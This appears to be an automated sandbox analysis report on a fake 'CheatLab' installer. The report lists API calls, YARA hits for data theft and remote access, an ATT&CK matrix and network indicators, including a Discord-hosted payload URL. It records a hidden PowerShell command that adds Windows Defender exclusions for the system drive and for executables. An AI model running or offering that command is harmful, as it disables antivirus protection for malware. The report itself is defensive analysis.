          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: 18_2_00007FF7B1E8DBB8 SetUnhandledExceptionFilter,18_2_00007FF7B1E8DBB8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: 18_2_00007FF7B1EB8900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF7B1EB8900
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: 18_2_00007FF7B1E8D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF7B1E8D0B0
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_004080CD _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_004080CD
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0040C35A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0040C35A
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0041145F SetUnhandledExceptionFilter,21_2_0041145F
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0040A46F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040A46F
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: 21_2_0040A7DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040A7DA

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A452F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,6_2_00A452F0
          Source: C:\Windows\SysWOW64\msiexec.exe, Process created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Windows\Installer\MSI7D5A.tmp, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
          Source: C:\Windows\System32\msiexec.exe, Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Queries volume information: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe VolumeInformation
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: EnumSystemLocalesW,6_2_00A7E0C6
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: EnumSystemLocalesW,6_2_00A7E1AC
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: EnumSystemLocalesW,6_2_00A77132
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: EnumSystemLocalesW,6_2_00A7E111
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00A7E237
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoEx,6_2_00A623F8
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoW,6_2_00A7E48A
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00A7E5B3
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoW,6_2_00A776AF
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetLocaleInfoW,6_2_00A7E6B9
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00A7E788
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00A7DE24
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: try_get_function,GetLocaleInfoW,17_2_00007FF73AF39934
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,17_2_00007FF73AF4A03C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: EnumSystemLocalesW,17_2_00007FF73AF392FC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00007FF73AF4AA70
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: EnumSystemLocalesW,17_2_00007FF73AF4A458
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: EnumSystemLocalesW,17_2_00007FF73AF4A388
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00007FF73AF4A894
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: EnumSystemLocalesW,18_2_00007FF7B1EB92FC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: try_get_function,GetLocaleInfoW,18_2_00007FF7B1EB9934
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF7B1ECA03C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: EnumSystemLocalesW,18_2_00007FF7B1ECA458
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: EnumSystemLocalesW,18_2_00007FF7B1ECA388
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF7B1ECA894
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF7B1ECAA70
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,21_2_00418849
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,21_2_00418815
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,21_2_00414972
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,21_2_00418988
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,21_2_00414A89
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,21_2_00414B21
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,21_2_004153C0
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoA,21_2_0040E3E4
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,21_2_00413BE6
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,21_2_00414B95
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoA,21_2_0041554E
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,21_2_00414D67
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,21_2_0040D56D
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,21_2_00413578
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_00414E28
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,21_2_00413E3E
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,21_2_004186C5
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,21_2_00414ECB
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe, Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_00414E8F
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A635A9 cpuid 6_2_00A635A9
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A637D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00A637D5
          Source: C:\Windows\Installer\MSI7D5A.tmp, Code function: 6_2_00A77B1F GetTimeZoneInformation,6_2_00A77B1F
          Source: Amcache.hve.25.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.25.dr, Binary or memory string: msmpeng.exe
          Source: Amcache.hve.25.dr, Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.25.dr, Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match File source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
          Source: Yara match File source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
          Source: Yara match File source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media
          1
          Scripting
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          11
          Disable or Modify Tools
          OS Credential Dumping2
          System Time Discovery
          1
          Replication Through Removable Media
          1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts3
          Native API
          1
          Scheduled Task/Job
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory11
          Peripheral Device Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Scheduled Task/Job
          1
          Registry Run Keys / Startup Folder
          11
          Process Injection
          1
          Scripting
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell
          Logon Script (Mac)1
          Scheduled Task/Job
          2
          Obfuscated Files or Information
          NTDS34
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon Script1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          LSA Secrets141
          Security Software Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion
          Cached Domain Credentials131
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items123
          Masquerading
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
          Virtualization/Sandbox Evasion
          Proc Filesystem1
          Application Window Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection
          /etc/passwd and /etc/shadow1
          System Network Configuration Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          [Behavior graph] Behavior Graph ID: 1337007, Sample: Cheat.Lab.2.7.1.msi, Startdate: 04/11/2023, Architecture: WINDOWS, Score: 44

          Source | Detection | Scanner | Label | Link
          Cheat.Lab.2.7.1.msi | 0% | ReversingLabs | |
          Cheat.Lab.2.7.1.msi | 2% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | 100% | Avira | TR/Crypt.OPACK.Gen |
          C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe | 0% | ReversingLabs | |
          C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe | 1% | Virustotal | | Browse
          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe | 0% | ReversingLabs | |
          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe | 1% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5D78.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5D78.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5D99.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5D99.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5E18.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5E18.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5E96.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5E96.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI92A9.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI92A9.tmp | 0% | Virustotal | | Browse
          C:\Users\user\AppData\Local\Temp\MSI92D9.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\MSI92D9.tmp | 0% | Virustotal | | Browse
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe |
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
          http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
          https://luajit.org/ | 0% | Avira URL Cloud | safe |
          https://luajit.org/ | 1% | Virustotal | | Browse
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cdn.discordapp.com | 162.159.130.233 | true | false | | high
          ip-api.com | 208.95.112.1 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt | false | | high
          http://ip-api.com/json/?fields=query,status,countryCode,city,timezone | false | | high
          http://cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://sectigo.com/CPS0 | connect.exe.11.dr | false | URL Reputation: safe | unknown
          https://luajit.org/ | NzEx.exe.11.dr | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | connect.exe.11.dr | false | URL Reputation: safe | unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | connect.exe.11.dr | false | URL Reputation: safe | unknown
          http://ocsp.sectigo.com0 | connect.exe.11.dr | false | URL Reputation: safe | unknown
          https://www.thawte.com/cps0/ | Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.dr | false | | high
          https://www.thawte.com/repository0W | Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.dr | false | | high
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | connect.exe.11.dr | false | URL Reputation: safe | unknown
          https://www.advancedinstaller.com | Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5E96.tmp.0.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr, MSI7D5A.tmp.1.dr, MSI7CBC.tmp.1.dr | false | | high
          http://upx.sf.net | Amcache.hve.25.dr | false | | high
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | connect.exe.11.dr | false | URL Reputation: safe | unknown
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
          162.159.130.233 | cdn.discordapp.com | United States | | 13335 | CLOUDFLARENETUS | false
          193.37.71.112 | unknown | Russian Federation | | 202723 | VAD-SRL-AS1MD | false
          Joe Sandbox Version: 38.0.0 Ammolite
          Analysis ID: 1337007
          Start date and time: 2023-11-04 01:29:08 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 9m 18s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed: 27
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample file name: Cheat.Lab.2.7.1.msi
          Detection: MAL
          Classification: mal44.troj.evad.winMSI@30/52@2/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 99
          • Number of non-executed functions: 293
          Cookbook Comments:
          • Found application associated with file extension: .msi
